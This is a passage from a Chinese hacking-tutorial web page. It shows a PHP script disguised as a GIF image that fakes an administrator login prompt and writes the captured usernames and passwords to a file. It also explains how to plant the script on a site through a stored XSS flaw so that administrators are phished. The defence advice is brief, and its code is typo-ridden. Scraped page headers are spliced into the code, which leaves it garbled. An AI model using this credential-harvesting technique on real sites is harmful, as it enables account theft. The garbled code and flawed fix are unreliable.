为了不让管理员发现,我们用图片来伪装了。好了,那我们就来看看利用程序吧!代码如下:
★
header("Content-type: image/gif");
$image = imagecreatefromgif('mellow.gif');
if(!
从黑客角度来阐述如何防御应用层攻击(图)_安全中国_全球最大网络安全培训门户
|
从黑客角度来阐述如何防御应用层攻击(图)
|
| 更新时间:2008-5-16 1:20:47 |
责任编辑:池天 | |
|
| $Content$ | | |
|
|
COOKIE['LOGON'])
{
$login =
从黑客角度来阐述如何防御应用层攻击(图)_安全中国_全球最大网络安全培训门户
|
从黑客角度来阐述如何防御应用层攻击(图)
|
| 更新时间:2008-5-16 1:20:47 |
责任编辑:池天 | |
|
| $Content$ | | |
|
|
SERVER['PHP_AUTH_USER'];
$pass =
从黑客角度来阐述如何防御应用层攻击(图)_安全中国_全球最大网络安全培训门户
|
从黑客角度来阐述如何防御应用层攻击(图)
|
| 更新时间:2008-5-16 1:20:47 |
责任编辑:池天 | |
|
| $Content$ | | |
|
|
SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="管理员验证 - login"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
★
新建个文档,把代码保存在文件内,后缀名改成图片格式。然后去网上找个小型的图片文件。将这两个图片放在同一个目录下就OK了。★$image = imagecreatefromgif('mellow.gif');★这里就是调用的正常图片文件!然后我们在跨站那里输入
,如果成功的话,就会生成个passwords.txt文件,文件内记录着管理员输入的帐号和密码!废话不少说了,现在我们来演示下吧,可能有的人说?管理一般都在后台进行留言管理的。很少跑到前台的,其实后台也要调用那文件。只要管理员进了后台,进行留言管理就能利用的。另外不要搞错哦,那代码是PHP的,要在PHP环境下才能正常解析!如果大家没有PHP的空间,去找个支持PHP的Webshell也行。大家看到没,出现了登陆框,不精明的网管会以为是程序的验证。那么,他就会输入帐号和密码再次进行验证。刷新下,密码框就不会出现。除非你删除你机子上的cookie才行。这样迷域性更大了,如图9
看到了吧 我们成功的偷到管理员的密码了。怎么样?你会利用了么??
现在大家都知道怎样去利用XSS漏洞,那也应该要学习学习怎样去修补漏洞!有攻就有防嘛,呵呵!这里我简单说一下修补漏洞利用replace()函数就可以了。可能有些初学者不太了解replace()函数怎样去利用。例如这段程序,未修补的代码:
★rs("title")=trim(request.form("title"))★
修补后的代码:
★Rs("title")=replace(trim(request.from("title")"<","//"))★
如果从客户端获取的title变量出现<就自动替换为//。那么测试语句就无法闭合了!当然还是可以转换为其它语句进行突破的,这只是演示怎样用replace函数简单的去过滤一些语句!我想,到这里大家也应该怎样去修补漏洞了吧!
笔者再说一下关于XSS的一点东西,可能有些朋友看完这篇文章以后会认为所有的跨站都是可以这么利用的。其实不然,有些跨站就真的只是能弹个窗口,但是他并不写入数据库。这样是没有任何意义的,我们来拿百度做实验,打开百度以后选择MP3然后点击音乐掌门人在搜索框内输入★
★,成功弹出fish的框框,如图11
虽然成功的弹出了对话框,但是这个并不能算是真正意义上的跨站,因为他并没有写入数据库,除了能糊弄一些不懂的人之外,并没有任何的利用价值的。 所以在寻找跨站漏洞以及利用的过程中更多的是需要认真观察。寻找任何可利用的蛛丝马迹。
上一页 1 2 3 4 5 6 7 下一页
安全中国首页 > 文章中心 > 黑客技术